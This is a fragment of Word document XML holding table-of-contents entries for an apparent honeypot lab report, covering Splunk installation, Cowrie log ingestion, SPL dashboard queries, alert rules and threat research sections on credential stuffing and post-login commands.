              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686569 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4E77833F" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686570" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>4.4  Attack Analysis Observations</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686570 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="59F2ECE4" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686571" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5. SIEM Integration &amp; Attack Dashboard</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686571 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5776BAF9" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686572" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.1  Install Splunk Enterprise on Ubuntu</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686572 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="00EFBBA0" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686573" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 1 — Download Splunk</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686573 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>22</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="07FDA273" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686574" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 2 — Install Splunk</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686574 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="284DC788" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686575" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 3 — Enable Splunk to Start on Boot</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686575 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4AEC82C3" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686576" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 4 — Access Splunk Web Interface</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686576 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E614692" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686577" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 5 — Add Cowrie Logs as Splunk Data Source</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686577 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="24DD3B63" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686578" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 6 — Verify Log Ingestion</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686578 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="563C119E" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686579" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.2  Attack Dashboard — SPL Queries</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686579 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="597CAD45" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686580" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.3  Configure the Alert Rule</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686580 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F1005DD" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686581" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.4  Dashboard Evidence</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686581 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>27</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44BDA1F0" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686582" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>5.5  SIEM Integration Observations &amp; Analysis</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686582 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="39FA45EF" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686583" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6. Threat Research Report</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686583 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5159C22E" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686584" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.1  Executive Summary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686584 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>29</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B7B4F2D" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686585" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.2  Environment Summary</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686585 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="449963D7" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686586" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>6.3  Attack Pattern Analysis</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686586 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4B97F790" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686587" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Username Targeting</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686587 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20011B97" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686588" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Credential Stuffing Profile</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686588 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="658C463F" w14:textId="77777777" w:rsidR="009F18E8" w:rsidRDefault="009F18E8">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9710"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc231686589" w:history="1">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Post-Login Command Sequence</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc231686589 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>32</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
